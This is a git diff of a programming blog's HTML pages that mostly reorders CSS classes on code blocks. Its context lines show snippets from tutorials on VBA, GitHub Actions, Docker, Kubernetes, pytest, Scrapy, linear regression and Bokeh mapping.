+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -317,7 +317,7 @@ 

    Function for Visible Cell

  • iCol - The column index we want to return
Without further ado, here is the function. Note that another function GetListObject is used to find the table in question; see GetListObject Function for more information on this. Otherwise you can use Application.Worksheets(sheetName).

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -367,7 +367,7 @@ 

    Function for Visible Cell

    GetListObject Function

    Similarly, the GetListObject function was also found on Stackoverflow, by the user AndrewD:

    https://stackoverflow.com/questions/18030637/how-do-i-reference-tables-in-excel-using-vba

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/getting-started-with-p5js.html b/getting-started-with-p5js.html
    index f0550131..d6e9d6e5 100644
    --- a/getting-started-with-p5js.html
    +++ b/getting-started-with-p5js.html
    @@ -163,7 +163,7 @@ 

    Getting Started with P5.js

Next in the draw function, which is repeatedly called while the browser has the page open, we loop through all the objects in the array and draw a circle (an ellipse with equal radii) and colour it according to how big its radius is (so we can watch it fade as it grows). We make use of the stroke function to define the colour of the lines for what we'll be drawing in that instance. If a drop has become too big we remove it from the array and add a new random drop; if it's still undersize we increase its radius and colour.

    Finally to add interactivity, we make use of the mouseIsPressed variable to determine if the user has clicked on the visualization and add a drop into the array at the X & Y position of where the user clicked.

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/github-actions-for-cicd.html b/github-actions-for-cicd.html
    index 6366f0f4..b19a9dba 100644
    --- a/github-actions-for-cicd.html
    +++ b/github-actions-for-cicd.html
    @@ -179,7 +179,7 @@ 

    Action Marketplace

    Action Format (.yaml)

    A Github Action is defined with a <action_name>.yaml file which must be placed within .github/workflows from the base of the repository. As many actions as you want can be placed in this folder, and will subsequently run when triggered.

    The base structure of a link_checker.yaml file is:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -254,7 +254,7 @@ 

    Actions on Pull Request

    Fork repository > Make changes > Submit Pull Request with changes > Check changes > Merge into repository

    When the action was first set up for actions to run on pull requests, it kept throwing an error:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>The process '/usr/bin/git' failed with exit code 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>The process '/usr/bin/git' failed with exit code 1
 </code></pre></div>
 </td></tr></tbody></table>

    This was determined to be intentional design by Github as a mitigation against the possibility that a bad actor could open PRs against your repo and do things like list out secrets or just run up a large bill (once we start charging) on your account.

    @@ -272,7 +272,7 @@

    Actions on Pull Request

    Ensure to use if: steps.prcomm.outputs.BOOL_TRIGGERED == 'true' in all subsequent jobs you want triggered if the phrase is found, otherwise the action will become recursive: check for comment, run checks, make a comment, check for comment, etc

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/how-pandas_alive-was-made.html b/how-pandas_alive-was-made.html
    index 7b1eebea..7039ebe3 100644
    --- a/how-pandas_alive-was-made.html
    +++ b/how-pandas_alive-was-made.html
    @@ -181,7 +181,7 @@ 

    Architecture

    Base Class

    Now that we've decided to go with template design pattern, we need to implement the base chart class with the shared functionality. At this point, since there would be so many parameters going into the class constructor (__init__) in Python, it was frustrating having to put this information in two places.

    Here is a basic example, but imagine if you had 10s of arguments (eg, name, species) and had to replicate this information so many times.

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    class Animal():
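The hunk above is truncated by the diff, so only the opening `class Animal():` survives. As a hedged sketch of the duplication being described (attribute names are illustrative, not the post's actual code):

```python
class Animal:
    """Every attribute name is repeated three times: in the
    signature, in the assignment, and again in __repr__."""

    def __init__(self, name, species, family, sound):
        self.name = name
        self.species = species
        self.family = family
        self.sound = sound

    def __repr__(self):
        return (f"Animal(name={self.name!r}, species={self.species!r}, "
                f"family={self.family!r}, sound={self.sound!r})")
```

With tens of arguments, every rename has to be made in several places, which is exactly the frustration the post describes.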
    @@ -192,7 +192,7 @@ 

    Base Class

    So once again, we research how someone else has already solved this problem, and we found attrs. Attrs allows us to create our classes and have the __init__ and other dunder methods generated for us (see a previous post on dunder methods here).

    This allows us to write the same class as above like:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @attr.s
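Only the `@attr.s` decorator line survives the diff above, and the post's actual attrs code is elided. As a runnable standard-library analogue of the same idea (not the author's code), Python's `dataclasses` module also generates the dunder methods from a single declaration:

```python
from dataclasses import dataclass

@dataclass
class Animal:
    # Each field is declared exactly once; __init__, __repr__
    # and __eq__ are generated automatically.
    name: str
    species: str
    family: str = "Animal Kingdom"
```

attrs predates dataclasses and offers more features, but the ergonomic win is the same: no hand-written constructor.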
    diff --git a/how-to-make-github-actions.html b/how-to-make-github-actions.html
    index 4f8d4c73..9b5cc6e6 100644
    --- a/how-to-make-github-actions.html
    +++ b/how-to-make-github-actions.html
    @@ -217,7 +217,7 @@ 

    Entrypoint.sh

    Publish to Marketplace

Once you've implemented these few files, you should get a warning at the top of the repository on GitHub hinting if you want to publish this on the marketplace. This is done smoothly by creating a release of your project, and that's it, done!

Now users can integrate your action into the CI/CD pipeline as easily as:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
    - name: Python Interrogate Check
       uses: JackMcKew/python-interrogate-check@v0.1.1
     
    diff --git a/index6.html b/index6.html index 226a4d4c..df905770 100644 --- a/index6.html +++ b/index6.html @@ -335,7 +335,7 @@

    Document code automatically through docstrings with Sphinx

    This post goes into how to generate documentation for your python projects automatically with Sphinx!

First off we have to install sphinx into our virtual environment. Depending on your flavour, we can do any of the following

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
    pip install sphinx …

    diff --git a/inheritance-in-python.html b/inheritance-in-python.html index d967fc5d..ccadc2ef 100644 --- a/inheritance-in-python.html +++ b/inheritance-in-python.html @@ -168,7 +168,7 @@

    Inheritance in Python

    This post will cover an introduction to the concept of inheritance using Python and the animal kingdom.

    First off, we are going to start by defining our 'base' class (also known as abstract class) of our Animal with common properties:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
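The body of the base class is elided by the hunk above; a minimal sketch consistent with the output quoted later in the post ("Woof!" then "Animal Kingdom"), with names assumed rather than taken from the original:

```python
class Animal:
    """Base ('abstract') class with properties common to all animals."""

    def __init__(self, name):
        self.name = name
        self.family = "Animal Kingdom"

    def speak(self):
        # Subclasses are expected to override this.
        raise NotImplementedError("Subclasses must implement speak()")

class Dog(Animal):
    def speak(self):
        print("Woof!")
        print(self.family)  # inherited from Animal
```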
    @@ -194,7 +194,7 @@ 

    Inheritance in Python

Now that we have our base class, we can define a subclass 'Dog' that will be able to speak if we define the function inside, but we can also see that it derives from its parent class 'Animal' by printing out its family.

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -218,14 +218,14 @@ 

    Inheritance in Python

    Which will print out:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
    Woof!
     Animal Kingdom
     

    See my post on dunders (double underscores) to get a better understanding of how the __init__ function is working: https://jackmckew.dev/dunders-in-python.html

Now we can define any subclass which can derive from our parent class 'Animal'; even better, we can derive a class from 'Dog' and it will have all its properties:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -241,13 +241,13 @@ 

    Inheritance in Python

    Which will also print:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
    Woof!
     Animal Kingdom
     

Now what if we wanted to specify the family that all of our dog classes are in? We can do this by overriding their parent class (similar to how we are overriding the speak function):

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
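The overriding example itself is elided by the hunk above; a hedged, self-contained sketch of the idea (class and attribute names assumed):

```python
class Animal:
    def __init__(self, name):
        self.name = name
        self.family = "Animal Kingdom"

class Dog(Animal):
    def __init__(self, name):
        super().__init__(name)
        # Override the attribute set by the parent class,
        # just as speak() overrides the parent's method.
        self.family = "Canidae"

    def speak(self):
        print("Woof!")
```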
    @@ -267,7 +267,7 @@ 

    Inheritance in Python

Then when we run the code below:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -291,7 +291,7 @@ 

    Inheritance in Python

    We will now get:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    Woof!
    diff --git a/intro-to-docker.html b/intro-to-docker.html
    index 0624ad6b..4b1f2331 100644
    --- a/intro-to-docker.html
    +++ b/intro-to-docker.html
    @@ -242,7 +242,7 @@ 

    Maintaining Docker in the Comman

    Dockerfile

A Dockerfile is a read-only template with instructions for creating a Docker container/image. It's composed of a series of commands, along with their given arguments. A straightforward example of a Dockerfile is:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -291,7 +291,7 @@ 

    Mounting Files

    Port Mapping

By default no traffic will be routed into a container, meaning a container has its own set of ports that are not connected to the local PC. Thus we need to set up a mapping between the local PC's ports and the container's ports.

    This is not changed within the Dockerfile, but rather when we run the container with the -p flag. This can be done with:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>docker run -p [local_pc_port] : [container_port] [image_name]
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>docker run -p [local_pc_port] : [container_port] [image_name]
 </code></pre></div>
 </td></tr></tbody></table>
    @@ -307,7 +307,7 @@

    Docker Compose

• Create a container that will host a nodejs app
  • Network the ports of the nodejs app container
-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    diff --git a/intro-to-games-in-python-with-pyglet.html b/intro-to-games-in-python-with-pyglet.html
    index 11cf2c58..b91a3215 100644
    --- a/intro-to-games-in-python-with-pyglet.html
    +++ b/intro-to-games-in-python-with-pyglet.html
    @@ -176,7 +176,7 @@ 

    Intro to Games in Python with Pygl

    If we run 'asteroid.py' from within the version 3 folder, we are met with this screen

    full_game_screen

    Now since all I am trying to do is generate multiple objects (which will be shown with the player symbol to indicate direction), I can comment out the lines which give the lives, score, title and interactive player.

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -223,13 +223,13 @@ 

    Intro to Games in Python with Pygl

    Now that we've done that, we need to modify the asteroids generator function to use the player sprite.

In load.py, you can simply change the img argument to the player image sprite reference like so:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>new_asteroid = physicalobject.PhysicalObject(img=resources.player_image,                                                     x=asteroid_x, y=asteroid_y,                                                 batch=batch)
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>new_asteroid = physicalobject.PhysicalObject(img=resources.player_image,                                                     x=asteroid_x, y=asteroid_y,                                                 batch=batch)
 </code></pre></div>
 </td></tr></tbody></table>

Now if we run this, the animation will look a little off, because the objects won't be traveling in the direction that the sprite is pointing. This is due to the existing velocity calculation being a random number for both the X and Y component.

    To make the player sprites move in the direction they are rotated in, and maintain the existing codebase, we will need to convert from polar notation to cartesian.

    To do this, we add an extra 2 functions into 'util.py' which will do this for us:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
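The two util.py functions are elided by the hunk above; a typical implementation of the polar-to-cartesian conversion being described (an assumption, not the post's verbatim code), with degrees converted to radians as the post notes:

```python
import math

def pol2cart(rho, phi_degrees):
    """Convert polar (magnitude, angle in degrees) to cartesian (x, y)."""
    phi = math.radians(phi_degrees)
    return rho * math.cos(phi), rho * math.sin(phi)

def cart2pol(x, y):
    """Convert cartesian (x, y) back to polar (magnitude, angle in degrees)."""
    return math.hypot(x, y), math.degrees(math.atan2(y, x))
```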
    @@ -250,7 +250,7 @@ 

    Intro to Games in Python with Pygl

Note the use of radians in pol2cart; this is due to the effect of quadrants on trigonometric functions. I won't go into detail, but without it, it won't behave like you expect it to.

    Now to get our player sprites moving in the direction they are rotated, update the code which generates the 'asteroids' to utilise our new function:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
    new_asteroid.rotation = random.randint(0, 360)
     new_asteroid.velocity_speed = random.random() * 40
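Putting the surviving lines together with the conversion just described, the velocity components would be derived roughly like this (attribute names follow the surviving context; pyglet's rotation sign convention may differ):

```python
import math
import random

rotation = random.randint(0, 360)       # degrees, as in the snippet above
velocity_speed = random.random() * 40   # polar magnitude

# Decompose the polar velocity into x/y components.
angle = math.radians(rotation)
velocity_x = velocity_speed * math.cos(angle)
velocity_y = velocity_speed * math.sin(angle)
```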
    diff --git a/intro-to-kubernetes.html b/intro-to-kubernetes.html
    index a0c224c4..9efc4dc0 100644
    --- a/intro-to-kubernetes.html
    +++ b/intro-to-kubernetes.html
    @@ -254,7 +254,7 @@ 

    Update Deployment Images

This is very challenging; here is a very thorough thread discussing ways to do this: https://github.com/kubernetes/kubernetes/issues/33664

    To do this imperatively, we ensure that the image we will be pulling is tagged with versioning on Docker Hub. After this we are able to run the command

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>kubectl set image [object_type] / [object_name] [container_name] = [new_image_to_use]
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>kubectl set image [object_type] / [object_name] [container_name] = [new_image_to_use]
 </code></pre></div>
 </td></tr></tbody></table>

    After running this command, the deployment will update the running pods with the new image.

    diff --git a/intro-to-web-scraping.html b/intro-to-web-scraping.html index b9ef0bc6..71ff9cf0 100644 --- a/intro-to-web-scraping.html +++ b/intro-to-web-scraping.html @@ -233,7 +233,7 @@

    Intro to Web Scraping

    What is Web Scraping

Web scraping, web harvesting or web data extraction is the process of extracting data from websites. While there are multiple ways to achieve this in Python (requests + beautiful soup, selenium, etc), my personal favourite package to use is Scrapy. While it may be daunting to begin with from a non object-oriented basis, you will soon appreciate it more once you've begun using it.

Initially the premise around the Scrapy package is to create 'web spiders'. If we take a look at the structure of the first example on the Scrapy website, we get an understanding of how to structure our web spiders when developing:

-<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
+<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -258,7 +258,7 @@ 

    What is Web Scraping

First of all we can see that the custom spider is essentially an extension of the scrapy.Spider class. It is to be noted that the name and start_urls variables (which are a part of the class) are special in the sense that the scrapy package uses them as configuration settings. When it comes to web scraping, if you have had experience using HTML, CSS and/or Javascript, this experience will become extremely useful; that is not to say it is not possible without experience, it's just a learning curve.

Following on, we can see a function for parsing (also specially named) in which there are 2 loops; the first for loop is going to loop through all titles marked as headers (specifically h2) and return a dictionary with the text in the heading.

    -
     1
    +
     1
      2
      3
      4
    @@ -289,7 +289,7 @@ 

    What is Web Scraping

    Now we have created our spider that looks through each row of the table on the webpage (more information on determining this can be found at https://docs.scrapy.org/en/latest/intro/tutorial.html). It's time to run the spider and take a look at the output. To run a spider, go into its directory from the command line and run 'scrapy crawl \<spider name>'; to store the output at the same time, use 'scrapy crawl \<spider name> -o filename.csv -t csv'.
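    The heading-collecting loop described earlier can be sketched without Scrapy, using only the standard library's html.parser; this is a hedged stand-in, not the post's actual spider, and the markup fed in is hypothetical:

```python
from html.parser import HTMLParser

# Collect the text of every <h2> heading on a page, mirroring the
# spider's first parse loop, but with no Scrapy dependency.
class HeadingParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_h2 = False
        self.headings = []

    def handle_starttag(self, tag, attrs):
        if tag == "h2":
            self.in_h2 = True

    def handle_endtag(self, tag):
        if tag == "h2":
            self.in_h2 = False

    def handle_data(self, data):
        if self.in_h2 and data.strip():
            self.headings.append(data.strip())

parser = HeadingParser()
parser.feed("<html><body><h2>First</h2><p>text</p><h2>Second</h2></body></html>")
# parser.headings now holds the heading text in document order
```

Scrapy's selectors do the same traversal far more conveniently (and asynchronously), which is why the post reaches for it.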

    Now similar to the previous post, we run a similar analysis and plot with Bokeh!

    -
     1
    +
     1
      2
      3
      4
    diff --git a/introduction-to-pytest-pipenv.html b/introduction-to-pytest-pipenv.html
    index 06528083..d13a66bc 100644
    --- a/introduction-to-pytest-pipenv.html
    +++ b/introduction-to-pytest-pipenv.html
    @@ -163,23 +163,23 @@ 

    Introduction to Pytest & Pipenv

    This post won't go into testing structures for complex applications, but rather just a simple introduction on how to write, run and check the output of a test in Python with pytest.

    As this post is on testing, I also thought it might be quite apt to trial a different package for dependency management. In the past I've used anaconda, virtualenv and plain pip, but this time I wanted to try out pipenv.

    Similar to my post Python Project Workflow where I used virtualenv, you must install pipenv in your base Python directory, and typically add the Scripts folder to your path for ease later on. Now all we need to do is navigate to the folder and run:

    -
    1
    pipenv shell
    +
    1
    pipenv shell
     

    This will create a virtual environment somewhere on your computer (unless specified otherwise) and create a Pipfile in the current folder. The Pipfile essentially describes all the packages used within the project, their version numbers & so on. This is extremely useful when you pick the project back up later, or if you wish to share it with others: they can generate their own virtual environment from the Pipfile with:

    -
    1
    pipenv install --dev
    +
    1
    pipenv install --dev
     

    Enough about pipenv, let's get onto trying out pytest.

    For this post I will place both my function and its tests in the same file; however, it's best practice to separate them, specifically keeping all tests within an aptly named 'tests' directory in your project/package.

    First off let's define the function we intend to test later:

    -
    1
    +
    1
     2
    def subtract(number_1, number_2):
         return number_1 - number_2
     

    Now we want to test if our function returns 1 if we give it number_1 = 2 and number_2 = 1:

    -
    1
    +
    1
     2
     3
     4
    import pytest
    @@ -189,18 +189,18 @@ 

    Introduction to Pytest & Pipenv

    To run this test, open the pipenv shell like above in the directory of the file where you've written your tests and run:

    -
    1
    pytest file_name.py
    +
    1
    pytest file_name.py
     

    This will output the following:

    image0.png

    Each green dot represents a single test, and we can see that our 1 test passes in 0.02 seconds.

    To get more information from pytest, use the same command with -v (verbose) option:

    -
    1
    pytest file_name.py -v
    +
    1
    pytest file_name.py -v
     

    Now we might want to check that it works for multiple cases. To do this we can use the parametrize functionality of pytest like so:

    -
     1
    +
     1
      2
      3
      4
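    A sketch of what that parametrized test might look like, reusing the subtract function from earlier; the specific cases here are my own assumptions:

```python
import pytest

def subtract(number_1, number_2):
    return number_1 - number_2

# Each tuple is one test case: (number_1, number_2, expected result).
# pytest runs test_subtract once per tuple and reports each separately.
@pytest.mark.parametrize("number_1,number_2,expected", [
    (2, 1, 1),
    (5, 3, 2),
    (0, 0, 0),
    (1, 2, -1),
])
def test_subtract(number_1, number_2, expected):
    assert subtract(number_1, number_2) == expected
```

Running `pytest file_name.py -v` then lists four tests instead of one, each named after its parameter values.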
    diff --git a/linear-regresssion-under-the-hood-with-the-normal-equation.html b/linear-regresssion-under-the-hood-with-the-normal-equation.html
    index 20301330..51fd3e7c 100644
    --- a/linear-regresssion-under-the-hood-with-the-normal-equation.html
    +++ b/linear-regresssion-under-the-hood-with-the-normal-equation.html
    @@ -183,7 +183,7 @@ 

    The Normal Equation

    Where \(\hat{\theta}\) is the value of \(\theta\) that minimises the cost function and \(y\) (once vectorised) is the vector of target values containing \(y^{(1)}\) to \(y^{(m)}\).

    For example if this equation was run on data generated from this formula:

    -
    1
    +
    1
     2
     3
     4
    import numpy as np
    @@ -194,30 +194,30 @@ 

    The Normal Equation

    10_6_2_gen

    Now to compute \(\hat{\theta}\) with the normal equation, we can use the inv() function from NumPy's Linear algebra module:

    -
    1
    +
    1
     2
    X_b = np.c_[np.ones((100,1)),X]
     theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y)
     

    With the actual function being \(y = 6 + 2x_0 + noise\), and the equation found:

    -
    1
    +
    1
     2
    array([[ 5.96356419],
            [ 2.00027727]])
     

    Since the noise makes it impossible to recover the exact parameters of the original function, we now use \(\hat{\theta}\) to make predictions:

    -
    1
    y_predict = X_new_b.dot(theta_best)
    +
    1
    y_predict = X_new_b.dot(theta_best)
     

    With y_predict being:

    -
    1
    +
    1
     2
    [[ 5.96356419]
      [ 9.96411873]]
     

    10_6_2_gen_solved
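    Putting the snippets above together into one runnable sketch; the data generation is seeded here, so the fitted numbers will differ slightly from those shown in the post:

```python
import numpy as np

rng = np.random.default_rng(0)
X = 2 * rng.random((100, 1))
y = 6 + 2 * X + rng.normal(size=(100, 1))  # y = 6 + 2x + noise

# Normal equation: theta_hat = (X^T X)^-1 X^T y
X_b = np.c_[np.ones((100, 1)), X]  # add x0 = 1 (bias term) to each instance
theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y)

# Predict at x = 0 and x = 2
X_new_b = np.c_[np.ones((2, 1)), np.array([[0.0], [2.0]])]
y_predict = X_new_b.dot(theta_best)
```

theta_best lands near [[6], [2]], with the noise pulling it slightly off the true parameters, just as in the post.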

    The equivalent code using Scikit-Learn would look like:

    -
    1
    +
    1
     2
     3
     4
    @@ -229,7 +229,7 @@ 

    The Normal Equation

    And it finds:

    -
    1
    +
    1
     2
     3
    [ 5.96356419] [[ 2.00027727]]
     [[ 5.96356419]
    diff --git a/looking-for-patterns-in-city-names-interactive-plotting.html b/looking-for-patterns-in-city-names-interactive-plotting.html
    index 8986bcd8..c74da8c8 100644
    --- a/looking-for-patterns-in-city-names-interactive-plotting.html
    +++ b/looking-for-patterns-in-city-names-interactive-plotting.html
    @@ -230,7 +230,7 @@ 

    Looking for Pat

    Firstly, we have to find a dataset of all the town names, and I found a database of all world cities names hosted on Kaggle here: https://www.kaggle.com/max-mind/world-cities-database.

    Get the data!

    -
    1
    +
    1
     2
     3
    # data source https://www.kaggle.com/max-mind/world-cities-database
     cities_df = pd.read_csv('./data/worldcitiespop.csv', header=0, sep=',', quotechar='"')
    @@ -238,13 +238,13 @@ 

    Get the data!

    After inspecting this data set, we're able to filter down to just New Zealand using the prefix "nz" in the Country column. It must be noted that this data set represents the current names of the towns, not the original Maori names (more on this will be covered in a later post). Now we want to extract the town names we wish to analyze out of the dataframe. For ease later on, we will extract this as a dictionary, such that we can assign to each town the count of each letter.

    -
    1
    +
    1
     2
    nz_cities = cities_df[cities_df['Country'] == "nz"]['AccentCity'].tolist()
     nz_dict = { i : 0 for i in nz_cities }
     

    Now we will create an ordered dictionary, with help from the collections package, which will store the count of each letter in the town name.

    -
    1
    +
    1
     2
    letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
     lcount = dict(OrderedDict([(l, 0) for l in letters]))
     
    @@ -258,7 +258,7 @@

    Get the data!

  • Then if the letter does appear, increment the value for that letter by 1.
  • This results in a dictionary for each town name, with the count of repeated letters.

    -
    1
    +
    1
     2
     3
     4
    @@ -272,13 +272,13 @@ 

    Get the data!

    Hooray! Now we have all the data we need broken down and ready for analysis. To make the analysis easier and more readable, we convert our nested dictionaries to a pandas dataframe and transpose it, such that we have the town name as the index, the letters as the columns and the counts of each letter as the values.

    -
    1
    +
    1
     2
    total_df = pd.DataFrame.from_dict(nz_dict)
     total_df = total_df.T
     

    Now we want to find which of these names have the maximum count for any particular letter and store it in a summary dataframe. It is to be noted that we could use the pivot function with aggregate types; however, I have not yet figured out a nice way to do this. If you know a nicer way, please let me know.

    -
    1
    +
    1
     2
     3
     4
    summary_df = pd.DataFrame()
    @@ -288,7 +288,7 @@ 

    Get the data!

    Now we use the equivalent of an INDEX-MATCH in Excel, which you can read more about here: https://towardsdatascience.com/name-your-favorite-excel-function-and-ill-teach-you-its-pandas-equivalent-7ee4400ada9f. Admittedly, we could've made the join earlier, but since I use INDEX-MATCH so often in Excel, I wanted to learn how to do the same in pandas. This is achieved with the map function (the equivalent of INDEX), using the index of another dataframe as the argument (the MATCH), which lets us rejoin the data set by matching on the city name from our original data set.

    -
    1
    +
    1
     2
    summary_df['Latitude'] = summary_df['City_Name'].map(cities_df.set_index(['AccentCity'])['Latitude'].to_dict()) * scale
     summary_df['Longitude'] = summary_df['City_Name'].map(cities_df.set_index(['AccentCity'])['Longitude'].to_dict()) * scale
     
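    A toy illustration of that INDEX-MATCH pattern, with made-up coordinates in place of the real dataset:

```python
import pandas as pd

# Hypothetical stand-ins for cities_df and summary_df
cities_df = pd.DataFrame({
    "AccentCity": ["Auckland", "Wellington"],
    "Latitude": [-36.85, -41.29],
})
summary_df = pd.DataFrame({"City_Name": ["Wellington", "Auckland"]})

# set_index + to_dict builds the lookup table (the MATCH);
# map applies it to each City_Name (the INDEX)
lookup = cities_df.set_index("AccentCity")["Latitude"].to_dict()
summary_df["Latitude"] = summary_df["City_Name"].map(lookup)
```

Each City_Name is looked up against the other dataframe's index, exactly like dragging an INDEX-MATCH formula down a column in Excel.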
    @@ -301,7 +301,7 @@

    Get the data!

  • the longitude and latitude of the town
    For plotting with Bokeh on a basemap, we need to convert from longitude & latitude to easting and northing. The pyproj package makes this very simple.

    -
    1
    +
    1
     2
     3
     4
    @@ -317,11 +317,11 @@ 

    Get the data!

    This function can be used to generate the easting and northing for every town from its longitude & latitude and add them to the dataframe.

    -
    1
    summary_df['E'], summary_df['N'] = zip(*summary_df.apply(lambda x: LongLat_to_EN(x['Longitude'], x['Latitude']), axis=1))
    +
    1
    summary_df['E'], summary_df['N'] = zip(*summary_df.apply(lambda x: LongLat_to_EN(x['Longitude'], x['Latitude']), axis=1))
     
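    For intuition, the pyproj call can be approximated with the spherical (Web) Mercator arithmetic directly; this stand-in avoids the pyproj dependency and is an approximation, not the post's exact projection:

```python
import math

def longlat_to_en(lon, lat):
    """Approximate Web Mercator (EPSG:3857) easting/northing from degrees."""
    radius = 6378137.0  # WGS84 equatorial radius in metres
    easting = math.radians(lon) * radius
    northing = math.log(math.tan(math.pi / 4 + math.radians(lat) / 2)) * radius
    return easting, northing

easting, northing = longlat_to_en(174.76, -36.85)  # roughly Auckland
```

New Zealand longitudes near 175°E give eastings around 19.5 million metres, and southern-hemisphere latitudes give negative northings, which is why the Bokeh axis limits take some trial and error.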

    Finally, it's time to plot our findings on a map. Before we initialise the map in Bokeh, we need to put the data into a ColumnDataSource, as for most plots, data tables and more in Bokeh. We also initialise the interactivity for when the user hovers over data points on the plot.

    -
     1
    +
     1
      2
      3
      4
    @@ -351,7 +351,7 @@ 

    Get the data!

    Finally time for the plot! Now admittedly, I haven't found an easy way to find the limits of the graph, so this was made with a lot of trial and error (If you know a better way, please let me know!).

    -
    1
    +
    1
     2
     3
     4
    diff --git a/make-a-readme-documentation-with-jupyter-notebooks.html b/make-a-readme-documentation-with-jupyter-notebooks.html
    index 875f17cd..3a4761d1 100644
